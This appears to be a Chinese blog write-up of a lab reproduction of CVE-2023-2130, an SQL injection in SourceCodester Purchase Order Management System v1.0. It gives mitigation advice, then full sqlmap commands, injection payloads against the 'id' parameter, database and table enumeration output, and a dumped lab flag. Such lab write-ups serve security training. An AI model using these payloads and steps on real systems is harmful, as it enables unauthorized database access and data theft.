SourceCodester v1.0 SQL 注入(CVE-2023-2130)

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,高可用系列 2核4GB
简介: SourceCodester v1.0 SQL 注入(CVE-2023-2130)

前言

CVE-2023-2130是一个影响SourceCodester Purchase Order Management System v1.0的SQL注入。此的存在是由于应用程序未能正确过滤和验证用户输入,使得可以通过SQL注入来执行任意SQL命令,从而对数据库进行未授权的访问和操作。

在利用此时,可以通过在输入字段中插入恶意SQL代码来实现以下目的:

  1. 获取敏感数据:例如用户凭证、个人信息等。
  2. 修改或删除数据:可以篡改数据库中的记录或删除数据。
  3. 执行管理操作:可能获取管理员权限并执行更高级别的操作。

此严重性评级为9.8(CVSSv3),属于高危。为了缓解此,可以采取以下措施:

  1. 使用准备好的语句:通过使用准备好的语句和参数化查询,可以有效地防止SQL注入。
  2. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只允许合法的输入。
  3. 最小权限原则:数据库用户应仅具有执行其所需操作的最低权限,避免使用高权限账户执行日常操作。
  4. 安全编码实践:采用安全编码实践,如使用ORM(对象关系映射)框架来处理数据库操作,避免手动拼接SQL语句。

春秋云场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:


实战演练:


提供各种网络安全攻防演练场景,模拟真实的网络事件,帮助用户在实际操作中掌握网络安全技术。

场景涵盖Web安全、系统安全、网络安全、社工等多个领域。


复现:


用户可以通过平台对已知的安全进行复现,了解的产生原因、利用方法和修复措施。

通过实战操作,帮助用户掌握利用和防护的技能。


教学培训:


提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。

包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。


竞赛与评测:


定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。

提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。


资源共享:


平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。

用户可以在社区中分享经验和资源,互相交流和学习。


春秋云镜适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

SourceCodester Purchase Order Management System v1.0 是一个基于Web的应用程序,设计用于简化和管理采购订单流程。该系统主要面向中小企业,以提高采购效率,减少手动处理错误,并保持采购记录的透明和可追踪性。

主要功能

  1. 用户管理
  • 系统允许管理员添加、编辑和删除用户账户,分配不同的权限级别,以确保只有授权用户才能访问和管理采购订单。
  1. 供应商管理
  • 用户可以添加和管理供应商信息,包括供应商名称、联系方式和地址。这有助于在采购订单创建时快速选择和联系供应商。
  1. 采购订单管理
  • 用户可以创建、编辑和查看采购订单。每个订单包括供应商信息、订单日期、交货日期、订单状态和详细的产品列表。
  1. 产品管理
  • 系统允许添加和管理产品信息,包括产品名称、描述、价格和库存数量。用户可以在创建采购订单时选择产品。
  1. 报告和记录
  • 提供详细的采购订单报告和历史记录,方便用户查看过去的订单记录和当前的订单状态。
  1. 通知系统
  • 系统可以发送通知,提醒用户处理新订单或更新订单状态。

技术栈

  • 前端:使用HTML、CSS和JavaScript构建,提供用户友好的界面。
  • 后端:基于PHP开发,处理业务逻辑和数据库操作。
  • 数据库:使用MySQL存储和管理数据,确保数据的持久性和完整性。

安装和运行

要安装和运行SourceCodester Purchase Order Management System v1.0,用户需要:

  1. Web服务器:如Apache或Nginx。
  2. PHP环境:确保服务器上安装和配置了PHP。
  3. 数据库:设置MySQL数据库并导入提供的数据库脚本。

优点

  • 简化采购流程:通过系统化管理,提高采购流程的效率和准确性。
  • 易于使用:直观的用户界面,使用户能够快速上手。
  • 灵活管理:支持多用户和权限管理,确保系统的安全性和灵活性。

SourceCodester Purchase Order Management System v1.0 是一个实用的工具,适合希望优化采购流程的企业和组织

复现

打开

直接进入是需要登录的

访问页面如下

传送 id 参数试试

使用 SQLMap 爆库

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" --dbs   
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:44:28 /2024-07-05/
 
[20:44:28] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=2807ae4e6fb...91fa107729'). Do you want to use those [Y/n] n
[20:44:30] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:44:30] [INFO] testing if the target URL content is stable
[20:44:30] [INFO] target URL content is stable
[20:44:30] [INFO] testing if GET parameter 'id' is dynamic
[20:44:31] [INFO] GET parameter 'id' appears to be dynamic
[20:44:31] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[20:44:31] [INFO] testing for SQL injection on GET parameter 'id'
[20:44:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:44:31] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[20:44:33] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[20:44:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:44:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:44:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:44:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:44:35] [INFO] testing 'Generic inline queries'
[20:44:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:44:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:44:35] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:44:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:44:45] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:44:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:44:45] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:44:45] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:44:45] [INFO] target URL appears to have 8 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] n
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:52] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. '--union-char=1') and/or try to force the back-end DBMS (e.g. '--dbms=mysql') 
[20:44:53] [INFO] target URL appears to be UNION injectable with 8 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] n
[20:44:56] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 140 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:44:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 7.3.33
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:44:58] [INFO] fetching database names
[20:44:58] [INFO] fetching number of databases
[20:44:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:44:58] [INFO] retrieved: 4
[20:44:58] [INFO] retrieved: information_schema
[20:45:05] [INFO] retrieved: mysql
[20:45:07] [INFO] retrieved: performance_schema
[20:45:13] [INFO] retrieved: purchase_order_db
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] purchase_order_db
 
[20:45:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'

爆表

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" --tables
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:48:52 /2024-07-05/
 
[20:48:52] [INFO] resuming back-end DBMS 'mysql' 
[20:48:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=78d32b89ed9...f529d4ed65'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:48:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:48:53] [INFO] fetching tables for database: 'purchase_order_db'
[20:48:53] [INFO] fetching number of tables for database 'purchase_order_db'
[20:48:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:48:53] [INFO] retrieved: 7
[20:48:54] [INFO] retrieved: item_list
[20:48:57] [INFO] retrieved: users
[20:48:59] [INFO] retrieved: supplier_list
[20:49:04] [INFO] retrieved: po_list
[20:49:07] [INFO] retrieved: system_info
[20:49:11] [INFO] retrieved: fllllaaaag
[20:49:16] [INFO] retrieved: order_items
Database: purchase_order_db
[7 tables]
+---------------+
| fllllaaaag    |
| item_list     |
| order_items   |
| po_list       |
| supplier_list |
| system_info   |
| users         |
+---------------+
 
[20:49:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'


爆字段

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting @ 20:50:10 /2024-07-05/
 
[20:50:11] [INFO] resuming back-end DBMS 'mysql' 
[20:50:11] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4a6065bd9e1...c4ebe38f25'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr
 
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:50:12] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:12] [INFO] fetching columns for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:12] [INFO] retrieved: 2
[20:50:13] [INFO] retrieved: id
[20:50:14] [INFO] retrieved: int(20)
[20:50:18] [INFO] retrieved: flag
[20:50:19] [INFO] retrieved: text
Database: purchase_order_db
Table: fllllaaaag
[2 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| flag   | text    |
| id     | int(20) |
+--------+---------+
 
[20:50:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'

爆数据

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=2" -D "purchase_order_db" -T "fllllaaaag" -C "flag" --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:50:39 /2024-07-05/
[20:50:40] [INFO] resuming back-end DBMS 'mysql' 
[20:50:40] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=c930771f176...8c2072b16f'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4461=4461 AND 'TVzr'='TVzr
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 4095 FROM (SELECT(SLEEP(5)))HoPf) AND 'jALb'='jALb
---
[20:50:41] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:50:41] [INFO] fetching entries of column(s) 'flag' for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [INFO] fetching number of column(s) 'flag' entries for table 'fllllaaaag' in database 'purchase_order_db'
[20:50:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:50:41] [INFO] retrieved: 1
[20:50:42] [INFO] retrieved: flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e}
Database: purchase_order_db
Table: fllllaaaag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{fd914d13-e36b-42df-8b11-881ffdfa8d5e} |
+--------------------------------------------+
[20:51:00] [INFO] table 'purchase_order_db.fllllaaaag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com/dump/purchase_order_db/fllllaaaag.csv'
[20:51:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2zebwf1tlm02lf5jfsmh.cloudeci1.ichunqiu.com'
[*] ending @ 20:51:00 /2024-07-05/


相关实践学习
基于ACK Serverless轻松部署企业级Stable Diffusion
本实验指导您在容器服务Serverless版(以下简称 ACK Serverless )中,通过Knative部署满足企业级弹性需求的Stable Diffusion服务。同时通过对该服务进行压测实验,体验ACK Serverless 弹性能力。
Kubernetes极速入门
Kubernetes(K8S)是Google在2014年发布的一个开源项目,用于自动化容器化应用程序的部署、扩展和管理。Kubernetes通常结合docker容器工作,并且整合多个运行着docker容器的主机集群。 本课程从Kubernetes的简介、功能、架构,集群的概念、工具及部署等各个方面进行了详细的讲解及展示,通过对本课程的学习,可以对Kubernetes有一个较为全面的认识,并初步掌握Kubernetes相关的安装部署及使用技巧。本课程由黑马程序员提供。   相关的阿里云产品:容器服务 ACK 容器服务 Kubernetes 版(简称 ACK)提供高性能可伸缩的容器应用管理能力,支持企业级容器化应用的全生命周期管理。整合阿里云虚拟化、存储、网络和安全能力,打造云端最佳容器化应用运行环境。 了解产品详情: https://www.aliyun.com/product/kubernetes
相关文章
|
5月前
|
SQL 安全 前端开发
Sourcecodester Fantastic Blog CMS v1.0 SQL 注入(CVE-2022-28512)
Sourcecodester Fantastic Blog CMS v1.0 SQL 注入(CVE-2022-28512)
|
6月前
|
SQL IDE Java
Java连接SQL Server数据库的详细操作流程
Java连接SQL Server数据库的详细操作流程
|
3月前
|
关系型数据库 MySQL 网络安全
5-10Can't connect to MySQL server on 'sh-cynosl-grp-fcs50xoa.sql.tencentcdb.com' (110)")
5-10Can't connect to MySQL server on 'sh-cynosl-grp-fcs50xoa.sql.tencentcdb.com' (110)")
|
5月前
|
SQL 存储 监控
SQL Server的并行实施如何优化?
【7月更文挑战第23天】SQL Server的并行实施如何优化?
134 13
|
5月前
|
SQL
解锁 SQL Server 2022的时间序列数据功能
【7月更文挑战第14天】要解锁SQL Server 2022的时间序列数据功能,可使用`generate_series`函数生成整数序列,例如:`SELECT value FROM generate_series(1, 10)。此外,`date_bucket`函数能按指定间隔(如周)对日期时间值分组,这些工具结合窗口函数和其他时间日期函数,能高效处理和分析时间序列数据。更多信息请参考官方文档和技术资料。
|
5月前
|
SQL 存储 网络安全
关系数据库SQLserver 安装 SQL Server
【7月更文挑战第26天】
69 6
|
5月前
|
存储 SQL C++
对比 SQL Server中的VARCHAR(max) 与VARCHAR(n) 数据类型
【7月更文挑战7天】SQL Server 中的 VARCHAR(max) vs VARCHAR(n): - VARCHAR(n) 存储最多 n 个字符(1-8000),适合短文本。 - VARCHAR(max) 可存储约 21 亿个字符,适合大量文本。 - VARCHAR(n) 在处理小数据时性能更好,空间固定。 - VARCHAR(max) 对于大文本更合适,但可能影响性能。 - 选择取决于数据长度预期和业务需求。
457 1
|
5月前
|
SQL Oracle 关系型数据库
MySQL、SQL Server和Oracle数据库安装部署教程
数据库的安装部署教程因不同的数据库管理系统(DBMS)而异,以下将以MySQL、SQL Server和Oracle为例,分别概述其安装部署的基本步骤。请注意,由于软件版本和操作系统的不同,具体步骤可能会有所变化。
376 3
|
4月前
|
SQL 安全 Java
驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接。错误:“The server selected protocol version TLS10 is not accepted by client
驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接。错误:“The server selected protocol version TLS10 is not accepted by client
530 0
|
5月前
|
SQL 存储 安全
数据库数据恢复—SQL Server数据库出现逻辑错误的数据恢复案例
SQL Server数据库数据恢复环境: 某品牌服务器存储中有两组raid5磁盘阵列。操作系统层面跑着SQL Server数据库,SQL Server数据库存放在D盘分区中。 SQL Server数据库故障: 存放SQL Server数据库的D盘分区容量不足,管理员在E盘中生成了一个.ndf的文件并且将数据库路径指向E盘继续使用。数据库继续运行一段时间后出现故障并报错,连接失效,SqlServer数据库无法附加查询。管理员多次尝试恢复数据库数据但是没有成功。
下一篇
DataWorks